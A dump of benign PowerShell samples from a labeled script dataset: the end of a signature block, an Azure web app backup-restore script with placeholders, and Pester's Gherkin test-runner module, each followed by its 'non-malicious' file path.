aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggLUMIICPQIBATCCAQChgdikgdUwgdIxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs # YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046 # ODZERi00QkJDLTkzMzUxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNl # cnZpY2WiIwoBATAHBgUrDgMCGgMVADYjRxll2zWgz8Z8og2xDnIkoxYQoIGDMIGA # pH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQAC # BQDpeY7NMCIYDzIwMjQwMjE2MTUzNTQxWhgPMjAyNDAyMTcxNTM1NDFaMHQwOgYK # KwYBBAGEWQoEATEsMCowCgIFAOl5js0CAQAwBwIBAAICEIMwBwIBAAICEoUwCgIF # AOl64E0CAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQAC # AwehIKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQB4GrFsuHQGIHdxaR6H # DP59qiMiVQ8wi1qKOXJCOgy1Tg3OEq4bDq+JD50qJPtz6TW2td5+j5ovpSmIamhT # fjpTDDpJqbPemq4xidITTrwmHvqynCosMyFtnyeQBPzu6gZ4zoXI9vxu96DOmfWX # REIhC4hfB8o2lvJPIQip0oEjDzGCBA0wggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1l # LVN0YW1wIFBDQSAyMDEwAhMzAAAB3V1XHZXUraobAAEAAAHdMA0GCWCGSAFlAwQC # AQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcNAQkE # MSIEIH2VPXIOD7PNio8eriZbnPd/DGqsQMBmdmqcDxbQc9U+MIH6BgsqhkiG9w0B # CRACLzGB6jCB5zCB5DCBvQQgYf8OLZplrE94mZx7R9FZN+1AjdNpUcWPkYjjesAx # Y2YwgZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAd1d # Vx2V1K2qGwABAAAB3TAiBCDizuENeKMWs6A/U6+a+FqBaJMrnZajBqKhsW7KHeAz # jDANBgkqhkiG9w0BAQsFAASCAgCCKfRm7SauraWAJHvEUNL7wOsXRl01CN0L0nzJ # Qnpl9ctPx+z8gJCoi1j/qSaHjMLwEWWokQb0/UQdx3kswrhQnnKI3zxzrlbvQmef # lMenqAJXmHpUxcQDbZLCBAGBUq84fHgoLhG+uUl88RpVLcTLWUrLQttDpphv7CEQ # RQMGFUl90GnvBLGtV/d0vtiFV8wY60sO/LCm/Xp9sdCRfDfaoNwqlDIu600U4hQh # O6RYW3pbMoSInSK9BWcS1UHZLDk6FbpUK7dzX5Dqgw+EZ1zR6LxGcMtiFAQ5LouM # PFmo2yq1fjokBvwBfbjFn1212DXAk8HyJ7UiR4fZWTcJXYi/zstiMRnfd/mPvKdJ # aaIIByURWOstHTfDOFH7eGNa/1ZzpzfpPtQE37hRcLDkWKKBdyDTvRGI+HUvLUeq # +jqd394aZ4FOen/cxKKVUh1MFGfUbvQF9hAYHbsVI1wfPUQF1Vfze/2pX0/qyF6e # ccfpsNnGPIKdvAopiuNEoSRkKYonWrGOXZIVut5X1wG+oGOsQJx0KXEDPkNV+/vB # BNYCTA4rwWP8HOKNv5V2Rtgd4TKBzlkqKhB7txzUnr3+98y8Tt+Cdc9aQAAZEImn # MhJrOM7mmb4E8kmMjAES9J5fNtNbBXXRQA3W+H76Gl/vXB4ZJAfxMhfOg2fYvn0x # /VKLYg== # SIG # End signature block
combined_dataset/train/non-malicious/892.ps1
892.ps1
$resourceGroupNameSub1 = "<replace-with-your-group-name>" $resourceGroupNameSub2 = "<replace-with-desired-new-group-name>" $webAppNameSub1 = "<replace-with-your-app-name>" $webAppNameSub2 = "<replace-with-desired-new-app-name>" $appServicePlanSub2 = "<replace-with-desired-new-plan-name>" $locationSub2 = "West Europe" Add-AzAccount Get-AzWebAppBackupList -ResourceGroupName $resourceGroupNameSub1 -Name $webAppNameSub1 $backup = (Get-AzWebAppBackupList -ResourceGroupName $resourceGroupNameSub1 -Name $webAppNameSub1 | where {$_.BackupId -eq <replace-with-BackupID>}) Add-AzAccount New-AzWebApp -ResourceGroupName $resourceGroupNameSub2 -AppServicePlan $appServicePlanSub2 -Name $webAppNameSub2 -Location $locationSub2 Restore-AzWebAppBackup -ResourceGroupName $resourceGroupNameSub2 -Name $webAppNameSub2 -StorageAccountUrl $backup.StorageAccountUrl -BlobName $backup.BlobName -Overwrite
combined_dataset/train/non-malicious/3011.ps1
3011.ps1
if (($PSVersionTable.ContainsKey('PSEdition')) -and ($PSVersionTable.PSEdition -eq 'Core')) { & $SafeCommands["Add-Type"] -Path "${Script:PesterRoot}/lib/Gherkin/core/Gherkin.dll" } else { & $SafeCommands["Import-Module"] -Name "${Script:PesterRoot}/lib/Gherkin/legacy/Gherkin.dll" } $GherkinSteps = @{} $GherkinHooks = @{ BeforeEachFeature = @() BeforeEachScenario = @() AfterEachFeature = @() AfterEachScenario = @() } function Invoke-GherkinHook { [CmdletBinding()] param([string]$Hook, [string]$Name, [string[]]$Tags) if ($GherkinHooks.${Hook}) { foreach ($GherkinHook in $GherkinHooks.${Hook}) { if ($GherkinHook.Tags -and $Tags) { :tags foreach ($hookTag in $GherkinHook.Tags) { foreach ($testTag in $Tags) { if ($testTag -match "^($hookTag)$") { & $hook.Script $Name break :tags } } } } elseif ($GherkinHook.Tags) { } else { & $GherkinHook.Script $Name } } } } function Invoke-Gherkin { [CmdletBinding(DefaultParameterSetName = 'Default')] param( [Parameter(Mandatory = $True, ParameterSetName = "RetestFailed")] [switch]$FailedLast, [Parameter(Position = 0, Mandatory = $False)] [Alias('Script', 'relative_path')] [string]$Path = $Pwd, [Parameter(Position = 1, Mandatory = $False)] [Alias("Name", "TestName")] [string[]]$ScenarioName, [Parameter(Position = 2, Mandatory = $False)] [switch]$EnableExit, [Parameter(Position = 4, Mandatory = $False)] [Alias('Tags')] [string[]]$Tag, [string[]]$ExcludeTag, [object[]] $CodeCoverage = @(), [Switch]$Strict, [string] $OutputFile, [ValidateSet('NUnitXml')] [string] $OutputFormat = 'NUnitXml', [Switch]$Quiet, [object]$PesterOption, [Pester.OutputTypes]$Show = 'All', [switch]$PassThru ) begin { & $SafeCommands["Import-LocalizedData"] -BindingVariable Script:ReportStrings -BaseDirectory $PesterRoot -FileName Gherkin.psd1 -ErrorAction SilentlyContinue If ([String]::IsNullOrEmpty($ReportStrings)) { & $SafeCommands["Import-LocalizedData"] -BaseDirectory $PesterRoot -BindingVariable Script:ReportStrings -UICulture 'en-US' -FileName Gherkin.psd1 -ErrorAction Stop } $CWD = [Environment]::CurrentDirectory $Location = & $SafeCommands["Get-Location"] [Environment]::CurrentDirectory = & $SafeCommands["Get-Location"] -PSProvider FileSystem $script:GherkinSteps = @{} $script:GherkinHooks = @{ BeforeEachFeature = @() BeforeEachScenario = @() AfterEachFeature = @() AfterEachScenario = @() } } end { if ($PSBoundParameters.ContainsKey('Quiet')) { & $SafeCommands["Write-Warning"] 'The -Quiet parameter has been deprecated; please use the new -Show parameter instead. To get no output use -Show None.' & $SafeCommands["Start-Sleep"] -Seconds 2 if (!$PSBoundParameters.ContainsKey('Show')) { $Show = [Pester.OutputTypes]::None } } if ($PSCmdlet.ParameterSetName -eq "RetestFailed" -and $FailedLast) { $ScenarioName = $script:GherkinFailedLast if (!$ScenarioName) { throw "There are no existing failed tests to re-run." } } $sessionState = Set-SessionStateHint -PassThru -Hint "Caller - Captured in Invoke-Gherkin" -SessionState $PSCmdlet.SessionState $pester = New-PesterState -TagFilter $Tag -ExcludeTagFilter $ExcludeTag -TestNameFilter $ScenarioName -SessionState $sessionState -Strict:$Strict -Show $Show -PesterOption $PesterOption | & $SafeCommands["Add-Member"] -MemberType NoteProperty -Name Features -Value (& $SafeCommands["New-Object"] System.Collections.Generic.List[PSObject] ) -PassThru | & $SafeCommands["Add-Member"] -MemberType ScriptProperty -Name FailedScenarios -PassThru -Value { $Names = $this.TestResult | & $SafeCommands["Group-Object"] Describe | & $SafeCommands["Where-Object"] { $_.Group | & $SafeCommands["Where-Object"] { -not $_.Passed } } | & $SafeCommands["Select-Object"] -ExpandProperty Name $this.Features | Select-Object -ExpandProperty Scenarios | & $SafeCommands["Where-Object"] { $Names -contains $_.Name } } | & $SafeCommands["Add-Member"] -MemberType ScriptProperty -Name PassedScenarios -PassThru -Value { $Names = $this.TestResult | & $SafeCommands["Group-Object"] Describe | & $SafeCommands["Where-Object"] { -not ($_.Group | & $SafeCommands["Where-Object"] { -not $_.Passed }) } | & $SafeCommands["Select-Object"] -ExpandProperty Name $this.Features | Select-Object -ExpandProperty Scenarios | & $SafeCommands["Where-Object"] { $Names -contains $_.Name } } Write-PesterStart $pester $Path Enter-CoverageAnalysis -CodeCoverage $CodeCoverage -PesterState $pester foreach ($FeatureFile in & $SafeCommands["Get-ChildItem"] $Path -Filter "*.feature" -Recurse ) { Invoke-GherkinFeature $FeatureFile -Pester $pester } $Script:GherkinSteps.Clear() $Location | & $SafeCommands["Set-Location"] [Environment]::CurrentDirectory = $CWD $pester | Write-PesterReport $coverageReport = Get-CoverageReport -PesterState $pester Write-CoverageReport -CoverageReport $coverageReport Exit-CoverageAnalysis -PesterState $pester if (& $SafeCommands["Get-Variable"]-Name OutputFile -ValueOnly -ErrorAction $script:IgnoreErrorPreference) { Export-PesterResults -PesterState $pester -Path $OutputFile -Format $OutputFormat } if ($PassThru) { $properties = @( "Path", "Features", "TagFilter", "TestNameFilter", "TotalCount", "PassedCount", "FailedCount", "Time", "TestResult", "PassedScenarios", "FailedScenarios" if ($CodeCoverage) { @{ Name = 'CodeCoverage'; Expression = { $coverageReport } } } ) $result = $pester | & $SafeCommands["Select-Object"] -Property $properties $result.PSTypeNames.Insert(0, "Pester.Gherkin.Results") $result } $script:GherkinFailedLast = @($pester.FailedScenarios.Name) if ($EnableExit) { Exit-WithCode -FailedCount $pester.FailedCount } } } function Import-GherkinSteps { [CmdletBinding()] param( [Alias("PSPath")] [Parameter(Mandatory = $True, Position = 0, ValueFromPipelineByPropertyName = $True)] $StepPath, [PSObject]$Pester ) begin { $Script:GherkinSteps.Clear() $Script:GherkinHooks.Clear() } process { $StepFiles = & $SafeCommands["Get-ChildItem"] $StepPath -Filter "*.?teps.ps1" -Include "*.[sS]teps.ps1" -Recurse foreach ($StepFile in $StepFiles) { $invokeTestScript = { [CmdletBinding()] param ( [Parameter(Position = 0)] [string] $Path ) & $Path } Set-ScriptBlockScope -ScriptBlock $invokeTestScript -SessionState $Pester.SessionState & $invokeTestScript $StepFile.FullName } & $SafeCommands["Write-Verbose"] "Loaded $($Script:GherkinSteps.Count) step definitions from $(@($StepFiles).Count) steps file(s)" } } function Import-GherkinFeature { [CmdletBinding()] param($Path, [PSObject]$Pester) $Background = $null $parser = & $SafeCommands["New-Object"] Gherkin.Parser $Feature = $parser.Parse($Path).Feature | Convert-Tags $Scenarios = $( :scenarios foreach ($Child in $Feature.Children) { $null = & $SafeCommands["Add-Member"] -MemberType "NoteProperty" -InputObject $Child.Location -Name "Path" -Value $Path foreach ($Step in $Child.Steps) { $null = & $SafeCommands["Add-Member"] -MemberType "NoteProperty" -InputObject $Step.Location -Name "Path" -Value $Path } switch ($Child.Keyword.Trim()) { { (Test-Keyword $_ 'scenario' $Feature.Language) -or (Test-Keyword $_ 'scenarioOutline' $Feature.Language) } { $Scenario = Convert-Tags -InputObject $Child -BaseTags $Feature.Tags } { Test-Keyword $_ 'background' $Feature.Language } { $Background = Convert-Tags -InputObject $Child -BaseTags $Feature.Tags continue scenarios } default { & $SafeCommands["Write-Warning"] "Unexpected Feature Child: $_" } } if ( $Scenario -is [Gherkin.Ast.ScenarioOutline] ) { $ScenarioIndex = 0 foreach ($ExampleSet in $Scenario.Examples) { ${Column Names} = @($ExampleSet.TableHeader.Cells | & $SafeCommands["Select-Object"] -ExpandProperty Value) $NamesPattern = "<(?:" + (${Column Names} -join "|") + ")>" $ExampleSetIndex = 0 foreach ($Example in $ExampleSet.TableBody) { $ScenarioIndex++ $ExampleSetIndex++ $Steps = foreach ($Step in $Scenario.Steps) { [string]$StepText = $Step.Text if ($StepText -match $NamesPattern) { for ($n = 0; $n -lt ${Column Names}.Length; $n++) { $Name = ${Column Names}[$n] if ($Example.Cells[$n].Value -and $StepText -match "<${Name}>") { $StepText = $StepText -replace "<${Name}>", $Example.Cells[$n].Value } } } if ($StepText -ne $Step.Text) { & $SafeCommands["New-Object"] Gherkin.Ast.Step $Step.Location, $Step.Keyword.Trim(), $StepText, $Step.Argument } else { $Step } } $ScenarioName = $Scenario.Name if ($ExampleSet.Name) { $ScenarioName = $ScenarioName + " [$($ExampleSet.Name.Trim()) $ExampleSetIndex]" } else { $ScenarioName = $ScenarioName + " [$ScenarioIndex]" } & $SafeCommands["New-Object"] Gherkin.Ast.Scenario $ExampleSet.Tags, $Scenario.Location, $Scenario.Keyword.Trim(), $ScenarioName, $Scenario.Description, $Steps | Convert-Tags $Scenario.Tags } } } else { $Scenario } } ) & $SafeCommands["Add-Member"] -MemberType NoteProperty -InputObject $Feature -Name Scenarios -Value $Scenarios -Force return $Feature, $Background, $Scenarios } function Invoke-GherkinFeature { [CmdletBinding()] param( [Alias("PSPath")] [Parameter(Mandatory = $True, Position = 0, ValueFromPipelineByPropertyName = $True)] [IO.FileInfo]$FeatureFile, [PSObject]$Pester ) $CWD = [Environment]::CurrentDirectory $Location = & $SafeCommands["Get-Location"] [Environment]::CurrentDirectory = & $SafeCommands["Get-Location"] -PSProvider FileSystem try { $Parent = & $SafeCommands["Split-Path"] $FeatureFile.FullName Import-GherkinSteps -StepPath $Parent -Pester $pester $Feature, $Background, $Scenarios = Import-GherkinFeature -Path $FeatureFile.FullName -Pester $Pester } catch [Gherkin.ParserException] { & $SafeCommands["Write-Error"] -Exception $_.Exception -Message "Skipped '$($FeatureFile.FullName)' because of parser error.`n$(($_.Exception.Errors | & $SafeCommands["Select-Object"] -Expand Message) -join "`n`n")" continue } $Pester.EnterTestGroup($Feature.Name, 'Script') $null = $Pester.Features.Add($Feature) Invoke-GherkinHook BeforeEachFeature $Feature.Name $Feature.Tags if ($Pester.TestNameFilter) { $Scenarios = foreach ($nameFilter in $Pester.TestNameFilter) { $Scenarios | & $SafeCommands["Where-Object"] { $_.Name -like $NameFilter } } $Scenarios = $Scenarios | & $SafeCommands["Get-Unique"] } if ($Pester.TagFilter) { $Scenarios = $Scenarios | & $SafeCommands["Where-Object"] { & $SafeCommands["Compare-Object"] $_.Tags $Pester.TagFilter -IncludeEqual -ExcludeDifferent } } if ($Pester.ExcludeTagFilter) { $Scenarios = $Scenarios | & $SafeCommands["Where-Object"] { !(& $SafeCommands["Compare-Object"] $_.Tags $Pester.ExcludeTagFilter -IncludeEqual -ExcludeDifferent) } } if ($Scenarios) { Write-Describe (New-Object PSObject -Property @{Name = "$($Feature.Keyword): $($Feature.Name)"; Description = $Feature.Description }) } try { foreach ($Scenario in $Scenarios) { Invoke-GherkinScenario $Pester $Scenario $Background $Feature.Language } } catch { $firstStackTraceLine = $_.ScriptStackTrace -split '\r?\n' | & $SafeCommands["Select-Object"] -First 1 $Pester.AddTestResult("Error occurred in test script '$($Feature.Path)'", "Failed", $null, $_.Exception.Message, $firstStackTraceLine, $null, $null, $_) $Pester.TestResult[-1].Describe = "Error in $($Feature.Path)" $Pester.TestResult[-1] | Write-PesterResult } finally { $Location | & $SafeCommands["Set-Location"] [Environment]::CurrentDirectory = $CWD } Invoke-GherkinHook AfterEachFeature $Feature.Name $Feature.Tags $Pester.LeaveTestGroup($Feature.Name, 'Script') } function Invoke-GherkinScenario { [CmdletBinding()] param( $Pester, $Scenario, $Background, $Language ) $Pester.EnterTestGroup($Scenario.Name, 'Scenario') try { Write-Context (New-Object PSObject -Property @{Name = "$(Get-Translation 'scenario' $Language): $($Scenario.Name)"; Description = $Scenario.Description }) $script:mockTable = @{} $script:GherkinScenarioScope = New-Module Scenario { $a = 4 } $script:GherkinSessionState = Set-SessionStateHint -PassThru -Hint Scenario -SessionState $Script:GherkinScenarioScope.SessionState New-TestDrive Invoke-GherkinHook BeforeEachScenario $Scenario.Name $Scenario.Tags $testResultIndexStart = $Pester.TestResult.Count if ($Background) { foreach ($Step in $Background.Steps) { Invoke-GherkinStep -Step $Step -Pester $Pester -Scenario $GherkinSessionState -Visible -TestResultIndexStart $testResultIndexStart } } foreach ($Step in $Scenario.Steps) { Invoke-GherkinStep -Step $Step -Pester $Pester -Scenario $GherkinSessionState -Visible -TestResultIndexStart $testResultIndexStart } Invoke-GherkinHook AfterEachScenario $Scenario.Name $Scenario.Tags } catch { $firstStackTraceLine = $_.ScriptStackTrace -split '\r?\n' | & $SafeCommands["Select-Object"] -First 1 $Pester.AddTestResult("Error occurred in scenario '$($Scenario.Name)'", "Failed", $null, $_.Exception.Message, $firstStackTraceLine, $null, $null, $_) $Pester.TestResult[-1].Describe = "Error in $($Scenario.Name)" $Pester.TestResult[-1] | Write-PesterResult } Remove-TestDrive $Pester.LeaveTestGroup($Scenario.Name, 'Scenario') Exit-MockScope } function Find-GherkinStep { [CmdletBinding()] param( [string]$Step, [string]$BasePath = $Pwd ) $OriginalGherkinSteps = $Script:GherkinSteps try { Import-GherkinSteps $BasePath -Pester $PSCmdlet $KeyWord, $StepText = $Step -split "(?<=^(?:Given|When|Then|And|But))\s+" if (!$StepText) { $StepText = $KeyWord } & $SafeCommands["Write-Verbose"] "Searching for '$StepText' in $($Script:GherkinSteps.Count) steps" $( foreach ($StepCommand in $Script:GherkinSteps.Keys) { & $SafeCommands["Write-Verbose"] "... $StepCommand" if ($StepText -match "^${StepCommand}$") { & $SafeCommands["Write-Verbose"] "Found match: $StepCommand" $StepCommand | & $SafeCommands["Add-Member"] -MemberType NoteProperty -Name MatchCount -Value $Matches.Count -PassThru } } ) | & $SafeCommands["Sort-Object"] MatchCount | & $SafeCommands["Select-Object"] @{ Name = 'Step' Expression = { $Step } }, @{ Name = 'Source' Expression = { $Script:GherkinSteps["$_"].Source } }, @{ Name = 'Implementation' Expression = { $Script:GherkinSteps["$_"] } } -First 1 } finally { $Script:GherkinSteps = $OriginalGherkinSteps } } function Invoke-GherkinStep { [CmdletBinding()] param ( $Step, [Switch]$Visible, $Pester, $ScenarioState, [int] $TestResultIndexStart ) if ($Step -is [string]) { $KeyWord, $StepText = $Step -split "(?<=^(?:Given|When|Then|And|But))\s+" if (!$StepText) { $StepText = $KeyWord $Keyword = "Step" } $Step = @{ Text = $StepText; Keyword = $Keyword } } $DisplayText = "{0} {1}" -f $Step.Keyword.Trim(), $Step.Text $PesterErrorRecord = $null $Elapsed = $null $NamedArguments = @{} try { $StepCommand = $( foreach ($StepCommand in $Script:GherkinSteps.Keys) { if ($Step.Text -match "^${StepCommand}$") { $StepCommand | & $SafeCommands["Add-Member"] -MemberType NoteProperty -Name MatchCount -Value $Matches.Count -PassThru } } ) | & $SafeCommands["Sort-Object"] MatchCount | & $SafeCommands["Select-Object"] -First 1 $previousStepsNotSuccessful = $false for ($i = $TestResultIndexStart; $i -lt ($Pester.TestResult.Count); $i++) { $previousTestResult = $Pester.TestResult[$i].Result if ($previousTestResult -eq "Failed" -or $previousTestResult -eq "Inconclusive") { $previousStepsNotSuccessful = $true break } } if (!$StepCommand -or $previousStepsNotSuccessful) { $skipMessage = if (!$StepCommand) { "Could not find implementation for step!" } else { "Step skipped (previous step did not pass)" } $PesterErrorRecord = New-PesterErrorRecord -Result Inconclusive -Message $skipMessage -File $Step.Location.Path -Line $Step.Location.Line -LineText $DisplayText } else { $NamedArguments, $Parameters = Get-StepParameters $Step $StepCommand $watch = & $SafeCommands["New-Object"] System.Diagnostics.Stopwatch $watch.Start() try { if ($NamedArguments.Count) { if ($NamedArguments.ContainsKey("Table")) { $DisplayText += "..." } $ScriptBlock = { . $Script:GherkinSteps.$StepCommand @NamedArguments @Parameters } } else { $ScriptBlock = { . $Script:GherkinSteps.$StepCommand @Parameters } } Set-ScriptBlockScope -ScriptBlock $Script:GherkinSteps.$StepCommand -SessionState $ScenarioState Write-ScriptBlockInvocationHint -Hint "Invoke-Gherkin step" -ScriptBlock $Script:GherkinSteps.$StepCommand $null = & $ScriptBlock } catch { $PesterErrorRecord = $_ } $watch.Stop() $Elapsed = $watch.Elapsed } } catch { $PesterErrorRecord = $_ } if ($Pester -and $Visible) { for ($p = 0; $p -lt $Parameters.Count; $p++) { $NamedArguments."Unnamed-$p" = $Parameters[$p] } if ($PesterErrorRecord.ErrorRecord) { $PesterErrorRecord = $PesterErrorRecord.ErrorRecord } ${Pester Result} = ConvertTo-PesterResult -ErrorRecord $PesterErrorRecord if (${Pester Result}.Result -eq 'Inconclusive') { ${Pester Result}.StackTrace = "At " + $Step.Keyword.Trim() + ', ' + $Step.Location.Path + ': line ' + $Step.Location.Line } else { ${Pester Result}.StackTrace += "`nFrom " + $Step.Location.Path + ': line ' + $Step.Location.Line } $Pester.AddTestResult($DisplayText, ${Pester Result}.Result, $Elapsed, ${Pester Result}.FailureMessage, ${Pester Result}.StackTrace, $null, $NamedArguments, $PesterErrorRecord) $Pester.TestResult[-1] | Write-PesterResult } } function Get-StepParameters { param($Step, $CommandName) $Null = $Step.Text -match $CommandName $NamedArguments = @{} $Parameters = @{} foreach ($kv in $Matches.GetEnumerator()) { switch ($kv.Name -as [int]) { 0 { } $null { $NamedArguments.($kv.Name) = $ExecutionContext.InvokeCommand.ExpandString($kv.Value) } default { $Parameters.([int]$kv.Name) = $ExecutionContext.InvokeCommand.ExpandString($kv.Value) } } } $Parameters = @($Parameters.GetEnumerator() | & $SafeCommands["Sort-Object"] Name | & $SafeCommands["Select-Object"] -ExpandProperty Value) if ($Step.Argument -is [Gherkin.Ast.DataTable]) { $NamedArguments.Table = $Step.Argument.Rows | ConvertTo-HashTableArray } if ($Step.Argument -is [Gherkin.Ast.DocString]) { $Parameters = @( $Parameters | & $SafeCommands["Where-Object"] { $_.Length } ) + $Step.Argument.Content } return @($NamedArguments, $Parameters) } function Convert-Tags { [CmdletBinding()] param( [Parameter(ValueFromPipeline = $true)] $InputObject, [Parameter(Position = 0)] [string[]]$BaseTags = @() ) process { [string[]]$Tags = foreach ($tag in $InputObject.Tags | & $SafeCommands['Where-Object'] { $_ }) { $tag.Name.TrimStart("@") } & $SafeCommands["Add-Member"] -MemberType NoteProperty -InputObject $InputObject -Name Tags -Value ([string[]]($Tags + $BaseTags)) -Force $InputObject } } function ConvertTo-HashTableArray { [CmdletBinding()] param( [Parameter(ValueFromPipeline = $true)] [Gherkin.Ast.TableRow[]]$InputObject ) begin { ${Column Names} = @() ${Result Table} = @() } process { ${InputObject Rows} = @($InputObject) if (!${Column Names}) { & $SafeCommands["Write-Verbose"] "Reading Names from Header" ${InputObject Header}, ${InputObject Rows} = ${InputObject Rows} ${Column Names} = @(${InputObject Header}.Cells | & $SafeCommands["Select-Object"] -ExpandProperty Value) } if ( $null -ne ${InputObject Rows} ) { & $SafeCommands["Write-Verbose"] "Processing $(${InputObject Rows}.Length) Rows" foreach (${InputObject row} in ${InputObject Rows}) { ${Pester Result} = @{} for ($n = 0; $n -lt ${Column Names}.Length; $n++) { ${Pester Result}.Add(${Column Names}[$n], ${InputObject row}.Cells[$n].Value) } ${Result Table} += @(${Pester Result}) } } } end { ${Result Table} } } function Get-Translations($TranslationKey, $Language) { if (-not (Test-Path variable:Script:GherkinLanguagesJson)) { $Script:GherkinLanguagesJson = ConvertFrom-Json2 (Get-Content "${Script:PesterRoot}/lib/Gherkin/gherkin-languages.json" | Out-String) $Script:ReportStrings.Describe = "{0}" $Script:ReportStrings.Context = "{0}" } $foundTranslations = $Script:GherkinLanguagesJson."$Language"."$TranslationKey" if (-not $foundTranslations) { Write-Warning "Translation key '$TranslationKey' is invalid" } return , $foundTranslations } function ConvertFrom-Json2([string] $jsonString) { if ($PSVersionTable.PSVersion.Major -le 2) { Add-Type -Assembly System.Web.Extensions return , (New-Object System.Web.Script.Serialization.JavaScriptSerializer).DeserializeObject($jsonString) } else { return ConvertFrom-Json $jsonString } } function Get-Translation($TranslationKey, $Language, $Index = -1) { $translations = (Get-Translations $TranslationKey $Language) if (-not $translations) { return } if ($Index -lt 0 -or $Index -ge $translations.Length) { $Index = if ($TranslationKey -eq "scenarioOutline" -or $TranslationKey -eq "feature" -or $TranslationKey -eq "examples") { 0 } else { 1 } } return $translations[$Index] } function Test-Keyword($Keyword, $TranslationKey, $Language) { return (Get-Translations $TranslationKey $Language) -contains $Keyword }
combined_dataset/train/non-malicious/sample_26_28.ps1
sample_26_28.ps1
